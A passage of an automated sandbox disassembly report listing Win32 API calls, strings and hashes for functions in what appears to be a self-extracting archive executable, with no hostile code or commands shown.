Part of subcall function 00B7B636: GdipAlloc.GDIPLUS(00000010), ref: 00B7B63C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B7B7B7
GlobalFree.KERNEL32(00000000), ref: 00B7B7DD

Strings

PNG, xrefs: 00B7B6D6

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 2d3c886514e535562a315ce7ded86581f85cac6993193cd8643d2456eb227119
Instruction ID: 5e6cdf34ea0c83e3cff1c6543dfe550edcd9ca3fafc50a91df4dc4c279864767
Opcode Fuzzy Hash: 2d3c886514e535562a315ce7ded86581f85cac6993193cd8643d2456eb227119
Instruction Fuzzy Hash: 5C316971200212AFD7259F61ED88E2BBFE8EF84751B05466AF919D3260EF31DC41CEA1

Function 00B7E8DF Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00B7E8FE
ShellExecuteExW.SHELL32(?), ref: 00B7EA2E
ShowWindow.USER32(?,00000000), ref: 00B7EA6D
GetExitCodeProcess.KERNEL32(?,?), ref: 00B7EAA9
CloseHandle.KERNEL32(?), ref: 00B7EACF
ShowWindow.USER32(?,00000001), ref: 00B7EB31

Strings

.inf, xrefs: 00B7E9EA
.exe, xrefs: 00B7EAD9

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 92baa1a3e37429c83bee0a61d94cbdf0509ec60ea246323e5c3fa188a9b7a440
Instruction ID: 548f3653682a5a7ff17802c60d7189c4039baa749598e3ba26a7f180c425ada7
Opcode Fuzzy Hash: 92baa1a3e37429c83bee0a61d94cbdf0509ec60ea246323e5c3fa188a9b7a440
Instruction Fuzzy Hash: 7751E6310043809ADB309B249884ABB7BE5FF4D744F0488DDF5F9A72A1EB71D985D752

Function 00B8BB1B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B86B09,00B86B09,?,?,?,00B8BD6C,00000001,00000001,62E85006), ref: 00B8BB75
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B8BD6C,00000001,00000001,62E85006,?,?,?), ref: 00B8BBFB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B8BCF5
__freea.LIBCMT ref: 00B8BD02

Part of subcall function 00B8A7FE: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B85594,?,0000015D,?,?,?,?,00B86A70,000000FF,00000000,?,?), ref: 00B8A830

__freea.LIBCMT ref: 00B8BD0B
__freea.LIBCMT ref: 00B8BD30

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 906f2b150d53d048e68d7a5bad39bc48cd44dc23a61bf3a5c93897cec21cc293
Instruction ID: 21eddd246b42a8d7134cad7f4db69811c1cb2c1750aaca92db358cba0e93a8c9
Opcode Fuzzy Hash: 906f2b150d53d048e68d7a5bad39bc48cd44dc23a61bf3a5c93897cec21cc293
Instruction Fuzzy Hash: 7651C07261021AAAEF25AF74CC81EAB7BE9EF44750F1546A9FC04E6160DB34DC41C760

Function 00B7BD1B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B71B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B71B56
Part of subcall function 00B71B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7063A,Crypt32.dll,00000000,00B706B4,00000200,?,00B70697,00000000,00000000,?), ref: 00B71B78

OleInitialize.OLE32(00000000), ref: 00B7BD34
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B7BD6B
SHGetMalloc.SHELL32(00BAA460), ref: 00B7BD75

Strings

3Uo, xrefs: 00B7BD4C
riched20.dll, xrefs: 00B7BD23

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Uo
API String ID: 3498096277-2552611257
Opcode ID: 7d99f2f0e49b61fe5154c6472f36521dbe590de94b1d791613398b7780d9c9c2
Instruction ID: 0df4fcf445aa9e887f8a89d7f6372f2bf9e8f6cce2a4fef69a88ba447b9ac1db
Opcode Fuzzy Hash: 7d99f2f0e49b61fe5154c6472f36521dbe590de94b1d791613398b7780d9c9c2
Instruction Fuzzy Hash: BDF0F9B1D00209ABCB20AF99D849DEFFFFCEF84704F00846AE415E2250DBB456458BA1

Function 00B6AB40 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00B68243,?,00000005,?,00000011), ref: 00B6ABBF
GetLastError.KERNEL32(?,?,00B68243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B6ABCC
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00B68243,?,00000005,?), ref: 00B6AC02
GetLastError.KERNEL32(?,?,00B68243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B6AC0A
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B68243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B6AC59

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 469e8c9952bc3b42fd402ee0aedc3c24a2cca295a3d34aba50e8024896f8a11e
Instruction ID: f890f13f608cb20bc7e3dd75afde02d2a1e4493abfa3228bdcde96e886c506fd
Opcode Fuzzy Hash: 469e8c9952bc3b42fd402ee0aedc3c24a2cca295a3d34aba50e8024896f8a11e
Instruction Fuzzy Hash: D93155305447816FEB309F24CD45BDABBD4FB06320F100B59F6A0A61C1C7B9A895CF96

Function 00B7C758 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7C769
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7C77A
IsDialogMessageW.USER32(000104C2,?), ref: 00B7C78E
TranslateMessage.USER32(?), ref: 00B7C79C
DispatchMessageW.USER32(?), ref: 00B7C7A6

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 22d576e009d813be4e2a32fa1545bbdd142c83e1f64b926ce8b4d31456c11ccf
Instruction ID: 0ec7ebbc52bd04d541901a457dd86df16773c232daf11238ff2d03b54384bf80
Opcode Fuzzy Hash: 22d576e009d813be4e2a32fa1545bbdd142c83e1f64b926ce8b4d31456c11ccf
Instruction Fuzzy Hash: C4F0DAB190162AAB8B30ABA6EC4CDDF7FACEE093917408419B51AD3110EF64E545CBF0

Function 00B7BBC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00B7BBD7
SHAutoComplete.SHLWAPI(?,00000010), ref: 00B7BC0E

Part of subcall function 00B73316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00B6D523,00000000,.exe,?,?,00000800,?,?,?,00B79E5C), ref: 00B7332C

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B7BBFE

Strings

EDIT, xrefs: 00B7BBE2, 00B7BBED, 00B7BBFA

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: c34bd77ff3f59cae299db936b96aac51829069c8f952cc76fe7fe77efc05803b
Instruction ID: 15d330e8762513d452748f4a9ad23e5c97eb062f2d7e2a199cdf044ce4fb97d2
Opcode Fuzzy Hash: c34bd77ff3f59cae299db936b96aac51829069c8f952cc76fe7fe77efc05803b
Instruction Fuzzy Hash: F6F082726006287ADB3156659C0AF9F76ACEB56B40F4480A1B904F7180DB64EA418AF9

Function 00B7ED2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B7ED44
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B7ED80

Strings

sfxcmd, xrefs: 00B7ED3F
sfxpar, xrefs: 00B7ED7B

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 6525d6bf228c66762a86aa0299236627210ac6c8ac6b63850b453bf98f15fd52
Instruction ID: 7c49af8683b54a863768617b848d7f845651afe2e92ef894e2a9ac5818bb9815
Opcode Fuzzy Hash: 6525d6bf228c66762a86aa0299236627210ac6c8ac6b63850b453bf98f15fd52
Instruction Fuzzy Hash: 60F0EC7140123067CB312B948C15EBA7BD8DF19B41B0080E1FC6D76051EB60CC40D6B0

Function 00B84DA2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,00B84D53,00000000,00000001,00BC40C4,?,?,?,00B84EF6,00000004,InitializeCriticalSectionEx,00B97424,InitializeCriticalSectionEx), ref: 00B84DAF
GetLastError.KERNEL32(?,00B84D53,00000000,00000001,00BC40C4,?,?,?,00B84EF6,00000004,InitializeCriticalSectionEx,00B97424,InitializeCriticalSectionEx,00000000,?,00B84CAD), ref: 00B84DB9
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00B83BF3), ref: 00B84DE1

Strings

api-ms-, xrefs: 00B84DC6

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: b504e5f0d18b6910d6166c4165dabfdcd7806b582ba4e1efa5c88ad219e8efbc
Instruction ID: e966ef66ea8f622cc2b0854d0fcdeba11772c5171534fb7fb429b3683e130904
Opcode Fuzzy Hash: b504e5f0d18b6910d6166c4165dabfdcd7806b582ba4e1efa5c88ad219e8efbc
Instruction Fuzzy Hash: 34E01A38285205B7EE102FA1ED46F593FD8AB11B55F1400B1FA0CA80F0EB61A951D784

Function 00B6A9E5 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B6A9F5
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B6AA0D
GetLastError.KERNEL32 ref: 00B6AA3F
GetLastError.KERNEL32 ref: 00B6AA5E

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: e51ab6d9b35e3dc4cfc2e49ea04ca864510b672102ada1691caf4f20feb6ceaf
Instruction ID: 10fbebb7df8807cbe8b24dff34ea405b64222368bf72285549c97cadfef74a65
Opcode Fuzzy Hash: e51ab6d9b35e3dc4cfc2e49ea04ca864510b672102ada1691caf4f20feb6ceaf
Instruction Fuzzy Hash: DA117C35500204EBCF209FA0DA44A6A37E9FB02364F2046ABF516A6190DB7CEE45DF53

Function 00B8BEF4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00B853FD,00000000,00000000,?,00B8BE9B,00B853FD,00000000,00000000,00000000,?,00B8C098,00000006,FlsSetValue), ref: 00B8BF26
GetLastError.KERNEL32(?,00B8BE9B,00B853FD,00000000,00000000,00000000,?,00B8C098,00000006,FlsSetValue,00B98A00,FlsSetValue,00000000,00000364,?,00B8A5E7), ref: 00B8BF32
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B8BE9B,00B853FD,00000000,00000000,00000000,?,00B8C098,00000006,FlsSetValue,00B98A00,FlsSetValue,00000000), ref: 00B8BF40

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 46b3c8f7a80283925b9a68844ec24b59141dc6ba6e756103958e79e76b974c1d
Instruction ID: 07c6787c85360677833d2acefa0e0389ac55f0cf4e5dc0f895afccf4a5da83e1
Opcode Fuzzy Hash: 46b3c8f7a80283925b9a68844ec24b59141dc6ba6e756103958e79e76b974c1d
Instruction Fuzzy Hash: A601A7326152269BCB215B78EC84E5777D8EF06BA17150665FA1AD7260DB20D801CBE0

Function 00B7233E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00012480,?,00000000,00000000), ref: 00B72362
SetThreadPriority.KERNEL32(?,00000000), ref: 00B723A9

Part of subcall function 00B676E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B67707

Strings

CreateThread failed, xrefs: 00B7236E

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: cb84619782d8d2380c359fc4e96a6ed54375172f00db4f09bd4af421795fae43
Instruction ID: 5a8c28259213c4dbc06a5c16172af380de5871a3a73c76d1de90be20ae496478
Opcode Fuzzy Hash: cb84619782d8d2380c359fc4e96a6ed54375172f00db4f09bd4af421795fae43
Instruction Fuzzy Hash: FF01D6B62487026FD6206F54DC86F6673E8EB41715F1102AFF796971D0CEA168408624

Function 00B6B20A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B6E79B,00000001,?,?,?,00000000,00B766C2,?,?,?), ref: 00B6B22E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00B766C2,?,?,?,?,?,00B76184,?), ref: 00B6B275
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00B6E79B,00000001,?,?), ref: 00B6B2A1

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: ed3b029c5a1c11a1f48ca4a77c5841e11fa0ef008c58a9b07821b5659b7443d9
Instruction ID: 2aa0b653fb3a14d3d40ffd15ea70b0b9e998df6e9e076bab0c8b71078eaa02cc
Opcode Fuzzy Hash: ed3b029c5a1c11a1f48ca4a77c5841e11fa0ef008c58a9b07821b5659b7443d9
Instruction Fuzzy Hash: F831B132248305AFDB14CF10D968F6E7BF5FB81715F04495DF981A7290CB78A988CBA2

Function 00B6B542 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00B6D68B: _wcslen.LIBCMT ref: 00B6D691

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B569
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B59C
GetLastError.KERNEL32(?,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B5B9

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: c6471df4dcc75bc73eb7626ab108af1b2a46e518ab2e2a7de7a6aa46298a1497
Instruction ID: 874f84308408f66d1ba40cbd05da6b676d0fb15ad7f68d330419937ebbc55559
Opcode Fuzzy Hash: c6471df4dcc75bc73eb7626ab108af1b2a46e518ab2e2a7de7a6aa46298a1497
Instruction Fuzzy Hash: 0201B5312042206AEF216B749C75FFE32E8DF2A780F044495FA03D6081DB5CDAC286A5

Function 00B8CA53 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B8CA78

Strings

, xrefs: 00B8CABD

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 8c3d7b9ee0205a5b7c3d0863452b749832e0ff81a62ca268f9ec22074798465e
Instruction ID: 269a15ba986c855fe63ed97ef98592002759bc1c04f8bfc077be1a5598e3f5f6
Opcode Fuzzy Hash: 8c3d7b9ee0205a5b7c3d0863452b749832e0ff81a62ca268f9ec22074798465e
Instruction Fuzzy Hash: 4E4126B150468C9EDB269E24CC85AF6BFF9EB45304F1408EDE58A87162D235AE45DF30

Function 00B8C12C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

